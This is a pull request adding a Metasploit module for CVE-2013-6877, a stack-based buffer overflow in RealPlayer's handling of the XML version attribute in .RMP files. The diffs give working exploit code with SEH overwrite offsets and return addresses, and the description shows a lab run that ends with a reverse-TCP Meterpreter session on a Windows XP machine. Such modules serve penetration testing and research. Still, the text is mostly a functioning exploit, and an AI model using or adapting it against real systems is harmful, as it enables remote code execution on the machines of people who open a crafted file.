### PR TITLE
Added module for CVE-2013-6877

### DIFF
--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           =>
+        'RealNetworks RealPlayer Version Attribute Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability in
+        version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
+        improper bounds checking of the version and encoding attributes inside
+        the XML declaration.
+
+        By persuading the victim to open a specially-crafted .RMP file, a
+        remote attacker could execute arbitrary code on the system or cause
+        the application to crash.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gabor Seljan' # Vulnerability discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-6877' ],
+          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'seh'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'  => "\x00\x22",
+          'Space'     => 532,
+        },
+      'Targets'       =>
+        [
+          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
+            {
+              'Offset' => 2540,
+              'Ret'    => 0x641930c8, # POP POP RET from rpap3260.dll
+              'Max'    => 3095,       # overflow occurs at 3080 byte
+            }
+          ],
+          [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
+            {
+              'Offset' => 2540,
+              'Ret'    => 0x63A630B8, # POP POP RET from rpap3260.dll
+              'Max'    => 3095,       # overflow occurs at 3080 byte
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 20, 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']),
+        ],
+      self.class)
+
+  end
+
+  def exploit
+
+    sploit = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
+    sploit << rand_text_alpha_upper(target['Offset'])
+    sploit << generate_seh_payload(target.ret)
+    sploit << make_nops(target['Max']-sploit.length)
+    sploit << "\x22\x3f\x3e\x3b"
+
+    # Create the file
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    file_create(sploit)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -89,3 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote
 
   end
 end
+

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -76,11 +76,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
 
-    sploit = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
+    sploit = "<?xml version=\"";
     sploit << rand_text_alpha_upper(target['Offset'])
     sploit << generate_seh_payload(target.ret)
     sploit << make_nops(target['Max']-sploit.length)
-    sploit << "\x22\x3f\x3e\x3b"
+    sploit << "\"?>";
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -49,16 +49,16 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
             {
-              'Offset' => 2540,
-              'Ret'    => 0x641930c8, # POP POP RET from rpap3260.dll
-              'Max'    => 3095,       # overflow occurs at 3080 byte
+              'OffsetClick' => 2540,       # Open via double click
+              'OffsetMenu'  => 13600,      # Open via File -> Open
+              'Ret'         => 0x641930C8, # POP POP RET from rpap3260.dll
             }
           ],
           [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
             {
-              'Offset' => 2540,
-              'Ret'    => 0x63A630B8, # POP POP RET from rpap3260.dll
-              'Max'    => 3095,       # overflow occurs at 3080 byte
+              'OffsetClick' => 2540,       # Open via double click
+              'OffsetMenu'  => 13600,      # Open via File -> Open
+              'Ret'         => 0x63A630B8, # POP POP RET from rpap3260.dll
             }
           ]
         ],
@@ -76,16 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
 
-    sploit = "<?xml version=\"";
-    sploit << rand_text_alpha_upper(target['Offset'])
+    sploit =  rand_text_alpha_upper(target['OffsetClick'])
     sploit << generate_seh_payload(target.ret)
-    sploit << make_nops(target['Max']-sploit.length)
-    sploit << "\"?>";
+    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
+    sploit << generate_seh_payload(target.ret)
+    sploit << rand_text_alpha_upper(17000) # Generate exception
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-
-    file_create(sploit)
+    file_create("<?xml version=\"" + sploit + "\"?>")
 
   end
 end

--- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
+++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => 'Dec 20, 2013',
+      'DisclosureDate' => 'Dec 20 2013',
       'DefaultTarget'  => 0))
 
       register_options(


### PR DESCRIPTION
The module exploits a vulnerability different from the one reported by Ricardo Narvaja, though the vendor assigned the same CVE, since they completely removed the RMP file support from the application, fixing both vulnerabilities.

Test run results below:

```
msf exploit(realplayer_ver_attribute_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(realplayer_ver_attribute_bof) > set lhost 192.168.10.134
lhost => 192.168.10.134
msf exploit(realplayer_ver_attribute_bof) > exploit

[*] Creating 'msf.rmp' file ...
[+] msf.rmp stored at /home/gabor/.msf4/local/msf.rmp
msf exploit(realplayer_ver_attribute_bof) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.10.134
lhost => 192.168.10.134
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.134:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.10.135
[*] Meterpreter session 1 opened (192.168.10.134:4444 -> 192.168.10.135:1984) at 2013-12-20 21:59:35 +0100

meterpreter > sysinfo
Computer        : GABOR-4F3A512AC
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.10.135 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) >
```
